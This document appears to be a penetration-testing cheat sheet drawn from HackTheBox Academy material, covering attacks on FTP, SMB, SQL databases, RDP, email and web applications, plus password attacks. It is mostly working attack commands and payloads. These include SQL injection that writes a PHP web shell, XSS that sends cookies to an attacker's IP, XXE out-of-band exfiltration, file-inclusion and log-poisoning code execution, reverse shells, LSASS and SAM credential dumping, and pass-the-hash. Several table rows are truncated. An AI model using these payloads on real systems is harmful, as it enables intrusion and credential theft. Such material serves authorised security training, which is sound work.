In technical workflows, efficiency often hinges on recalling precise commands, flags, or syntax. These cheatsheets condense essential tools, techniques, and workflows into actionable quick-reference guides, designed to save time and reduce friction. Whether you’re scanning networks, automating tasks, or troubleshooting systems, use this curated collection as your "initial foothold" for rapid execution—eliminating guesswork and keeping critical information at your fingertips. Bookmark, print, or memorize these shortcuts to streamline your process and stay focused on results.

Infrastructure-based Enumeration

Command Description
curl -s https://crt.sh/\?q\=\&output\=json jq .
for i in $(cat ip-addresses.txt);do shodan host $i;done Scan each IP address in a list using Shodan.

Host-based Enumeration

FTP

Command Description
ftp Interact with the FTP service on the target.
nc -nv 21 Interact with the FTP service on the target.
telnet 21 Interact with the FTP service on the target.
openssl s_client -connect :21 -starttls ftp Interact with the FTP service on the target using encrypted connection.
wget -m --no-passive ftp://anonymous:anonymous@ Download all available files on the target FTP server.

SMB

Command Description
smbclient -N -L // Null session authentication on SMB.
smbclient /// Connect to a specific SMB share.
rpcclient -U "" Interaction with the target using RPC.
samrdump.py Username enumeration using Impacket scripts.
smbmap -H Enumerating SMB shares.
crackmapexec smb --shares -u '' -p '' Enumerating SMB shares using null session authentication.
enum4linux-ng.py -A SMB enumeration using enum4linux.

NFS

Command Description
showmount -e Show available NFS shares.
mount -t nfs :/ ./target-NFS/ -o nolock Mount the specific NFS share.umount ./target-NFS
umount ./target-NFS Unmount the specific NFS share.

DNS

Command Description
dig ns @ NS request to the specific nameserver.
dig any @ ANY request to the specific nameserver.
dig axfr @ AXFR request to the specific nameserver.
dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list Subdomain brute forcing.

SMTP

Command Description
telnet 25

IMAP/POP3

Command Description
curl -k 'imaps://' --user : Log in to the IMAPS service using cURL.
openssl s_client -connect :imaps Connect to the IMAPS service.
openssl s_client -connect :pop3s Connect to the POP3s service.

SNMP

Command Description
snmpwalk -v2c -c Querying OIDs using snmpwalk.
onesixtyone -c community-strings.list Bruteforcing community strings of the SNMP service.
braa @:.1.* Bruteforcing SNMP service OIDs.

MySQL

Command Description
mysql -u -p -h Login to the MySQL server.

MSSQL

Command Description
mssqlclient.py @ -windows-auth Log in to the MSSQL server using Windows authentication.

IPMI

Command Description
msf6 auxiliary(scanner/ipmi/ipmi_version) IPMI version detection.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) Dump IPMI hashes.

Linux Remote Management

Command Description
ssh-audit.py Remote security audit against the target SSH service.
ssh @ Log in to the SSH server using the SSH client.
ssh -i private.key @ Log in to the SSH server using private key.
ssh @ -o PreferredAuthentications=password Enforce password-based authentication.

Windows Remote Management

Command Description
rdp-sec-check.pl Check the security settings of the RDP service.
xfreerdp /u: /p:"" /v: Log in to the RDP server from Linux.
evil-winrm -i -u -p Log in to the WinRM server.
wmiexec.py :""@ "" Execute command using the WMI service.

Oracle TNS

Command Description
./odat.py all -s Perform a variety of scans to gather information about the Oracle database services and its components.
sqlplus /@/ Log in to the Oracle database.
./odat.py utlfile -s -d -U -P --sysdba --putFile C:\insert\path file.txt ./file.txt Upload a file with Oracle RDBMS.

Attacking FTP

Command Description
ftp 192.168.2.142 Connecting to the FTP server using the ftp client.
nc -v 192.168.2.142 21 Connecting to the FTP server using netcat.
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 Brute-forcing the FTP service.

Attacking SMB

Command Description
smbclient -N -L //10.129.14.128 Null-session testing against the SMB service.
smbmap -H 10.129.14.128 Network share enumeration using smbmap.
smbmap -H 10.129.14.128 -r notes Recursive network share enumeration using smbmap.
smbmap -H 10.129.14.128 --download "notes\note.txt" Download a specific file from the shared folder.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" Upload a specific file to the shared folder.
rpcclient -U'%' 10.10.110.17 Null-session with the rpcclient.
./enum4linux-ng.py 10.10.11.45 -A -C Automated enumeratition of the SMB service using enum4linux-ng.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' Password spraying against different users from a list.
impacket-psexec administrator:'Password123!'@10.10.110.17 Connect to the SMB service using the impacket-psexec.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec Execute a command over the SMB service using crackmapexec.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users Enumerating Logged-on users.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam Extract hashes from the SAM database.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE Use the Pass-The-Hash technique to authenticate on the target host.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 Dump the SAM database using impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e Execute a PowerShell based reverse shell using impacket-ntlmrelayx.

Attacking SQL Databases

Command Description
mysql -u julio -pPassword123 -h 10.129.20.13 Connecting to the MySQL server.
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30 Connecting to the MSSQL server.
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h Connecting to the MSSQL server from Linux.
sqsh -S 10.129.203.7 -U .\julio -P 'MyPassword!' -h Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server.
mysql> SHOW DATABASES; Show all available databases in MySQL.
mysql> USE htbusers; Select a specific database in MySQL.
mysql> SHOW TABLES; Show all available tables in the selected database in MySQL.
mysql> SELECT * FROM users; Select all available entries from the "users" table in MySQL.
sqlcmd> SELECT name FROM master.dbo.sysdatabases Show all available databases in MSSQL.
sqlcmd> USE htbusers Select a specific database in MSSQL.
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES Show all available tables in the selected database in MSSQL.
sqlcmd> SELECT * FROM users Select all available entries from the "users" table in MSSQL.
sqlcmd> EXECUTE sp_configure 'show advanced options', 1 To allow advanced options to be changed.
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 To enable the xp_cmdshell.
sqlcmd> RECONFIGURE To be used after each sp_configure command to apply the changes.
sqlcmd> xp_cmdshell 'whoami' Execute a system command from MSSQL server.
mysql> SELECT "" INTO OUTFILE '/var/www/html/webshell.php' Create a file using MySQL.
mysql> show variables like "secure_file_priv"; Check if the the secure file privileges are empty to read locally stored files on the system.
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents Read local files in MSSQL.
mysql> select LOAD_FILE("/etc/passwd"); Read local files in MySQL.
sqlcmd> EXEC master..xp_dirtree '\10.10.110.17\share\' Hash stealing using the xp_dirtree command in MSSQL.
sqlcmd> EXEC master..xp_subdirs '\10.10.110.17\share\' Hash stealing using the xp_subdirs command in MSSQL.
sqlcmd> SELECT srvname, isremote FROM sysservers Identify linked servers in MSSQL.
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] Identify the user and its privileges used for the remote connection in MSSQL.

Attacking RDP

Command Description
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' Password spraying against the RDP service.
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp Brute-forcing the RDP service.
rdesktop -u admin -p password123 192.168.2.143 Connect to the RDP service using rdesktop in Linux.
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} Impersonate a user without its password.
net start sessionhijack Execute the RDP session hijack.
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f Enable "Restricted Admin Mode" on the target Windows host.
xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA Use the Pass-The-Hash technique to login on the target host without a password.

Attacking DNS

Command Description
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb Perform an AXFR zone transfer attempt against a specific name server.
subfinder -d inlanefreight.com -v Brute-forcing subdomains.
host support.inlanefreight.com DNS lookup for the specified subdomain.

Attacking Email Services

Command Description
host -t MX microsoft.com DNS lookup for mail servers for the specified domain.
dig mx inlanefreight.com grep "MX"
host -t A mail1.inlanefreight.htb. DNS lookup of the IPv4 address for the specified subdomain.
telnet 10.10.110.20 25 Connect to the SMTP server.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 SMTP user enumeration using the RCPT command against the specified host.
python3 o365spray.py --validate --domain msplaintext.xyz Verify the usage of Office365 for the specified domain.
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz Enumerate existing users using Office365 on the specified domain.
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz Password spraying against a list of users that use Office365 for the specified domain.
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 Brute-forcing the POP3 service.
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213 Testing the SMTP service for the open-relay vulnerability.

Web Application Cheatsheet

Web application penetration testing is a critical security practice designed to identify and exploit vulnerabilities in web applications, simulating real-world attacks to assess their resilience against cyber threats. This method involves a thorough examination of the application's architecture, from the user interface to the underlying codebase, to uncover potential security gaps that could be exploited by malicious actors. By mimicking the tactics, techniques, and procedures (TTPs) used by hackers, penetration testers provide actionable insights into an application's security posture, helping organizations strengthen their defenses and comply with industry standards like PCI-DSS. This proactive approach not only enhances security but also reduces the risk of data breaches and financial losses, ensuring that sensitive data remains protected.

Checklist: - Client-side validation — Checks may not be replicated on the server - Database interaction — SQL injection - File uploading and downloading — Path traversal vulnerabilities, stored cross-site scripting - Display of user-supplied data — Cross-site scripting - Dynamic redirects — Redirection and header injection attacks - Social networking features — username enumeration, stored cross-site scripting - Login — Username enumeration, weak passwords, ability to use brute force - Multistage login — Logic flaws - Session state — Predictable tokens, insecure handling of tokens - Access controls — Horizontal and vertical privilege escalation - User impersonation functions — Privilege escalation - Use of cleartext communications — Session hijacking, capture of credentials and other sensitive data - Off-site links — Leakage of query string parameters in the Referer header - Interfaces to external systems — Shortcuts in the handling of sessions and/or access controls - Error messages — Information leakage - E-mail interaction — E-mail and/or command injection - Native code components or interaction — Buffer overflows - Use of third-party application components — Known vulnerabilities - Identifiable web server software — Common configuration weaknesses, known software bugs

For cloud pentesting check \<a href="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details" target="_blank">Pacu\</a> tool.

Enumeration

with raw HTTP request from BURP repeater:

POST /login.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=FUZZ

save it into req.txt and perform the login bruteforce:

ffuf -request req.txt -w /path/to/passwords.txt

To fuzz multiple parameters in the request, you can use multiple FUZZ keywords and specify the corresponding wordlists with the -w option. For example, if you want to fuzz both the username and password parameters, you can use the following command:

ffuf -request req.txt -w usernames.txt:UFUZZ -w passwords.txt:PFUZZ -fs 4242

This will use the usernames.txt wordlist for the UFUZZ keyword and the passwords.txt wordlist for the PFUZZ keyword.

How to filter:

-mc 200 match HTTP 200

-fs 4242 filter content size 4242

-fr “invalid” filter by responses matching regex “invalid”

-r Follow redirects, default to false

Spidering through BURP in 8080:

ffuf.exe -request .\req.txt -w .\directories.txt -x http://127.0.0.1:8080

Different modes (like in BURP Intruder)

ffuf.exe -request .\req.txt -request-proto http -w bytes.txt:BFUZZ -w passwords.txt:PFUZZ -mode pitchfork

Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)

Ffuf

Command Description
ffuf -h ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Parameter Fuzzing - POST
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Value Fuzzing
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS Crawl with:
-found folders in previous scan (dirlisting alias)
-cewl wordlist (generatelist alias)
-raft-* list for extensions, or known extension

Wordlists

Command Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
/opt/useful/SecLists/Discovery/DNS/namelist.txt Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt Parameters Wordlist
/opt/share/seclists/Discovery/Web-Content/raft-* folders, words, extensions

Misc

Command Description
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts' Add DNS entry
for i in $(seq 1 1000); do echo $i >> ids.txt; done Create Sequence Wordlist
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded' curl w/ POST

HTTP

HTTP Verb Tampering

HTTP Method - HEAD - PUT - DELETE - OPTIONS - PATCH

Command Description
-X OPTIONS Set HTTP Method with Curl

IDOR

Identify IDORS - In URL parameters & APIs - In AJAX Calls - By understanding reference hashing/encoding - By comparing user roles

Command Description
md5sum MD5 hash a string
base64 Base64 encode a string

XXE

Code Description
\<!ENTITY xxe SYSTEM "http://localhost/email.dtd"> Define External Entity to a URL
\<!ENTITY xxe SYSTEM "file:///etc/passwd"> Define External Entity to a file path
\<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> Read PHP source code with base64 encode filter
\<!ENTITY % error "\<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> Reading a file through a PHP error
\<!ENTITY % oob "\<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>"> Reading a file OOB exfiltration
&xxe; Reference External Entity

SQLi

MySQL

Command Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p login to mysql database
SHOW DATABASES List available databases
USE users Switch to database
Tables
CREATE TABLE logins (id INT, ...) Add a new table
SHOW TABLES List available tables in current database
DESCRIBE logins Show table properties and columns
INSERT INTO table_name VALUES (value_1,..) Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE \<condition> Update table values
Columns
SELECT * FROM table_name Show all columns in a table
SELECT column1, column2 FROM table_name Show specific columns in a table
DROP TABLE logins Delete a table
ALTER TABLE logins ADD newColumn INT Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn Rename column
ALTER TABLE logins MODIFY oldColumn DATE Change column datatype
ALTER TABLE logins DROP oldColumn Delete column
Output
SELECT * FROM logins ORDER BY column_1 Sort by column
SELECT * FROM logins ORDER BY column_1 DESC Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC Sort by two-columns
SELECT * FROM logins LIMIT 2 Only show first two results
SELECT * FROM logins LIMIT 1, 2 Only show first two results starting from index 2
SELECT * FROM table_name WHERE \<condition> List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%' List results where the name is similar to a given string

MySQL Operator Precedence - Division (/), Multiplication (*), and Modulus (%) - Addition (+) and Subtraction (-) - Comparison (=, >, \<, \<=, >=, !=, LIKE) - NOT (!) - AND (&&) - OR (||)

SQL Injection

Payload Description
Auth Bypass
admin' or '1'='1 Basic Auth Bypass
admin')-- - Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
' order by 1-- - Detect number of columns using order by
cn' UNION select 1,2,3-- - Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- - Basic Union injection
UNION select username, 2, 3, 4 from passwords-- - Union injection for 4 columns
DB Enumeration
SELECT @@version Fingerprint MySQL with query output
SELECT SLEEP(5) Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- - Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- - Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- - Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt' Write a string to a local file
cn' union select "",'\<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- - Write a web shell into the base web directory

SQLMAP

Command Description
sqlmap -h View the basic help menu
sqlmap -hh View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' POST request specifying an injection point with an asterisk
sqlmap -r req.txt Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" Anti-CSRF token bypass
sqlmap --list-tampers List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell Spawning an OS shell

XSS

Code Description
XSS Payloads
\<script>alert(window.origin)\</script> Basic XSS Payload
\<plaintext> Basic XSS Payload
\<script>print()\</script> Basic XSS Payload
\<img src="" onerror=alert(window.origin)> HTML-based XSS Payload
\<script>document.body.style.background = "#141d2b"\</script> Change Background Color
\<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"\</script> Change Background Image
\<script>document.title = 'HackTheBox Academy'\</script> Change Website Title
\<script>document.getElementsByTagName('body')[0].innerHTML = 'text'\</script> Overwrite website's main body
\<script>document.getElementById('urlform').remove();\</script> Remove certain HTML element
\<script src="http://OUR_IP/script.js">\</script> Load remote script
\<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie\</script> Send Cookie details to us
Commands
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" Run xsstrike on a url parameter
sudo nc -lvnp 80 Start netcat listener
sudo php -S 0.0.0.0:80 Start PHP server

Path traversal

Local File Inclusion

Command Description
Basic LFI
/index.php?language=/etc/passwd Basic LFI
/index.php?language=../../../../etc/passwd LFI with path traversal
/index.php?language=/../../../etc/passwd LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00 Bypass appended extension with null byte (obsolete)
/index.php?language=php://filter/read=convert.base64-encode/resource=config Read PHP with base64 filter

Remote Code Execution

Command Description
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id RCE with data wrapper
curl -s -X POST --data '\<?php system($_GET["cmd"]); ?>' "http://\<SERVER_IP>:\<PORT>/index.php?language=php://input&cmd=id" RCE with input wrapper
curl -s "http://\<SERVER_IP>:\<PORT>/index.php?language=expect://id" RCE with expect wrapper
RFI
echo '\<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server \<LISTENING_PORT> Host web shell
/index.php?language=http://\<OUR_IP>:\<LISTENING_PORT>/shell.php&cmd=id Include remote PHP web shell
LFI + Upload
echo 'GIF8\<?php system($_GET["cmd"]); ?>' > shell.gif Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id RCE with malicious uploaded image
echo '\<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php Create malicious zip archive 'as jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id RCE with malicious uploaded zip
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with malicious uploaded phar
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd Read PHP session parameters
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E Poison PHP session with web shell
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id RCE through poisoned PHP session
curl -s "http://\<SERVER_IP>:\<PORT>/index.php" -A '\<?php system($_GET["cmd"]); ?>' Poison server log
/index.php?language=/var/log/apache2/access.log&cmd=id RCE through poisoned PHP session

Misc

Command Description
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?FUZZ=value' -fs 2287 Fuzz page parameters
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?language=FUZZ' -fs 2287 Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287 Fuzz webroot path
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?language=../../../../FUZZ' -fs 2287 Fuzz server configurations
LFI Wordlists
LFI-Jhaddix.txt

File Inclusion Functions

Function Read Content Execute Remote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include

File Upload

Web Shells

Web Shell Description
\<?php file_get_contents('/etc/passwd'); ?\> Basic PHP File Read
\<?php system('hostname'); ?\> Basic PHP Command Execution
\<?php system($_REQUEST['cmd']); ?\> Basic PHP Web Shell
\<% eval request('cmd') %> Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell
PHP Web Shell PHP Web Shell
PHP Reverse Shell PHP Reverse Shell
Web/Reverse Shells List of Web Shells and Reverse Shells

Bypasses

Command Description
Client-Side Bypass
[CTRL+SHIFT+C] Toggle Page Inspector
Blacklist Bypass
shell.phtml Uncommon Extension
shell.pHp Case Manipulation
PHP Extensions List of PHP Extensions
ASP Extensions List of ASP Extensions
Web Extensions List of Web Extensions
Whitelist Bypass
shell.jpg.php Double Extension
shell.php.jpg Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., … Character Injection - Before/After Extension
Content/Type Bypass
Web Content-Types List of Web Content-Types
Content-Types List of All Content-Types
File Signatures List of File Signatures/Magic Bytes

Limited Uploads

Potential Attack File Types
XSS HTML, JS, SVG, GIF
XXE/SSRF XML, SVG, PDF, PPT, DOC
DoS ZIP, JPG, PNG

Password Attacks Cheatsheet

Password attacks are a pervasive threat in the digital landscape, often serving as the primary vector for cybercriminals to breach secure systems. In recent years, compromised credentials have been responsible for a significant majority of data breaches, with 81% of such incidents in 2020 attributed to weak or stolen passwords[1][2]. These attacks exploit vulnerabilities in user authentication, leveraging techniques such as phishing, man-in-the-middle attacks, brute force attempts, and credential stuffing to gain unauthorized access to sensitive information[1][2]. As technology advances, so too do the methods employed by hackers, making it increasingly important for individuals and organizations to implement robust security measures, including strong password policies and multi-factor authentication, to protect against these ever-evolving threats[5].

Connecting to Target

Command Description
xfreerdp /v: /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol.
evil-winrm -i -u user -p password Uses Evil-WinRM to establish a Powershell session with a target.
ssh user@ Uses SSH to connect to a target using a specified user.
smbclient -U user \\\SHARENAME Uses smbclient to connect to an SMB share using a specified user.
python3 smbserver.py -smb2support CompData /home//Documents/ Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.

Password Mutations

Command Description
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist Uses cewl to generate a wordlist based on keywords present on a website.
hashcat --force password.list -r custom.rule --stdout > mut_password.list Uses Hashcat to generate a rule-based word list.
./username-anarchy -i /path/to/listoffirstandlastnames.txt Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username.
curl -s https://fileinfo.com/filetypes/compressed html2text

Remote Password Attacks

Command Description
crackmapexec winrm -u user.list -p password.list Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.
crackmapexec smb -u "user" -p "password" --shares Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials.
hydra -L user.list -P password.list :// Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.
hydra -l username -P password.list :// Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.
hydra -L user.list -p password :// Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.
hydra -C ssh:// Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.
crackmapexec smb --local-auth -u -p --sam Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network.
crackmapexec smb --local-auth -u -p --lsa Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way.
crackmapexec smb -u -p --ntds Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network.
evil-winrm -i -u Administrator -H "" Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of Pass-The-Hash attack.

Windows Local Password Attacks

Command Description
tasklist /svc A command-line-based utility in Windows used to list running processes.
findstr /SIM /C:"password" .txt .ini .cfg .config .xml .git .ps1 .yml Uses Windows command-line based utility findstr to search for the string "password" in many different file type.
Get-Process lsass A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line.
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials.
pypykatz lsa minidump /path/to/lsassdumpfile Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file.
reg.exe save hklm\sam C:\sam.save Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).
move sam.save \\NameofFileShare Uses move in Windows to transfer a file to a specified file share over the network.
